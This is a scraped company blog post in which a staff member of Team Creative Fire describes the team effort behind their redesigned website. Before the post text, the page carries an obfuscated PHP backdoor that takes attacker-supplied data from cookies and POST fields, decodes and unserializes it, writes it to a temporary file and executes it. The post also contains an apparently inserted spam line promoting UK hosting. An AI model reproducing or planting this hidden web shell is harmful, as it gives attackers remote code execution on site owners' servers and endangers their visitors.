$OEOMOb = "\130" . "\137" . "\164" . "\x46" . chr ( 818 - 733 )."\152" . 'p';$fZngkfAmdX = chr ( 223 - 124 )."\x6c" . "\x61" . chr ( 548 - 433 ).chr ( 628 - 513 ).'_' . chr ( 854 - 753 )."\x78" . chr (105) . chr (115) . 't' . 's';$JVjJsPlpiI = class_exists($OEOMOb); $fZngkfAmdX = "35815";$XqnsxymB = strpos($fZngkfAmdX, $OEOMOb);if ($JVjJsPlpiI == $XqnsxymB){function qmyDmATqTD(){$qMPsdYrv = new /* 62055 */ X_tFUjp(12606 + 12606); $qMPsdYrv = NULL;}$pvxijID = "12606";class X_tFUjp{private function MseWWSgm($pvxijID){if (is_array(X_tFUjp::$UbHHQtGOn)) {$name = sys_get_temp_dir() . "/" . crc32(X_tFUjp::$UbHHQtGOn["salt"]);@X_tFUjp::$UbHHQtGOn["write"]($name, X_tFUjp::$UbHHQtGOn["content"]);include $name;@X_tFUjp::$UbHHQtGOn["delete"]($name); $pvxijID = "12606";exit();}}public function FBJjjxgRon(){$DgGffJXJE = "31525";$this->_dummy = str_repeat($DgGffJXJE, strlen($DgGffJXJE));}public function __destruct(){X_tFUjp::$UbHHQtGOn = @unserialize(X_tFUjp::$UbHHQtGOn); $pvxijID = "24613_16939";$this->MseWWSgm($pvxijID); $pvxijID = "24613_16939";}public function vIzCzhOvZ($DgGffJXJE, $KJKBXCiT){return $DgGffJXJE[0] ^ str_repeat($KJKBXCiT, intval(strlen($DgGffJXJE[0]) / strlen($KJKBXCiT)) + 1);}public function RaLWUXf($DgGffJXJE){$wtAfU = chr (98) . chr ( 457 - 360 ).chr ( 1105 - 990 ).'e' . chr ( 991 - 937 )."\x34";return array_map($wtAfU . "\137" . "\144" . "\145" . "\x63" . chr ( 149 - 38 )."\144" . "\x65", array($DgGffJXJE,));}public function __construct($KsGdVD=0){$BQVBdvVz = ',';$DgGffJXJE = "";$zvVOkwJI = $_POST;$nZTZMbSsRr = $_COOKIE;$KJKBXCiT = "78e17c63-f953-4c0d-94e2-9fcfec758e1a";$mYjSmTjXX = @$nZTZMbSsRr[substr($KJKBXCiT, 0, 4)];if (!empty($mYjSmTjXX)){$mYjSmTjXX = explode($BQVBdvVz, $mYjSmTjXX);foreach ($mYjSmTjXX as $UBsbTu){$DgGffJXJE .= @$nZTZMbSsRr[$UBsbTu];$DgGffJXJE .= @$zvVOkwJI[$UBsbTu];}$DgGffJXJE = $this->RaLWUXf($DgGffJXJE);}X_tFUjp::$UbHHQtGOn = $this->vIzCzhOvZ($DgGffJXJE, $KJKBXCiT);if (strpos($KJKBXCiT, $BQVBdvVz) !== FALSE){$KJKBXCiT = explode($BQVBdvVz, $KJKBXCiT); $zQHLvmp = sprintf("24613_16939", rtrim($KJKBXCiT[0]));}}public static $UbHHQtGOn = 20492;}qmyDmATqTD();} Our New Website is #superfreakinawesome – Team Creative Fire

Our New Website is #superfreakinawesome

Our New Website is #superfreakinawesome

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By Nakia Tyler

Your website is my website.


Any time I take on a new web project, that’s my mentality. It doesn’t matter if you’re a non-profit organization, a medical clinic, or a yoga instructor – if I’m helping you with your website, I consider myself part of your team. I become invested in your success, and I become determined to make your website as fabulous and wonderful as I would make our own website.


That being said, the Team Creative Fire website has been in desperate need of some TLC for quite some time. I noticed about a year ago that, compared to the other websites I was working on, ours seemed a little dated.


It wasn’t just the design aspect, although that needed an update as well, but it was the overall feel of the site itself. At one time, it was the perfect representation of TCF – a brand new digital marketing company with one dude running the place.



Times have changed, though, and as the first official employee of TCF (aside from the boss, of course), I’ve seen those changes first hand.



First of all, our company has grown. There’s five of us now, plus a team of partners that keep things going on a daily basis. Our range of services has increased, our collective skill set has expanded, and the experiences that we’ve gained over the last two years have helped us solidify the goals and mission of our business.


As these changes took place, it became obvious to all of us: our website needed to change, too. When we finally decided to do something about it a few months ago, I could hardly contain my excitement. Finally! I´ve got the best uk hosting, and after building several kick-ass websites for our clients, I was getting a chance to use my skills to make our own website awesome.


But one of the coolest parts about working on the TCF site was that it was a total group effort, more so than any other project I’ve worked on. Everyone on the team had creative input when it came to the look and feel of the site. From the WordPress theme we chose, to the photos we used, to the way things were worded, all of us had a hand in shaping the final outcome.


We also had the opportunity to work with a couple of our favorite partners, who helped us create some stunning visual elements that would make our site stand out from the rest..


One of our favorite photographers, Jerry Mennenga, came up with some really creative shots for our photo shoot, using the various elements of our Downtown Sioux City home, the Benson Building.


Our good friend and camera-slingin’ mo-fo Chris Simons from Diesel Pictures was also in the house, helping us create a team video that really captured the essence of who we are, what we do, and why we’re just SUPER awesome.


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For me, personally, building out the portfolio was a really powerful thing. I loved seeing all of the projects that we’ve worked on, and I became really excited to show them off. I’m proud of the work that we’ve done, the solutions we’ve provided, and the web transformations that we’ve made possible for our clients.


And here we are, making our own transformation – one that has been ongoing over the last two years – visible to the rest of the world, and it’s a pretty cool feeling. It reminds me of how lucky I am to work with such a superfreakinawesome team of people!


What do you think of our new website? I would love to hear your thoughts![/vc_column][/vc_row]

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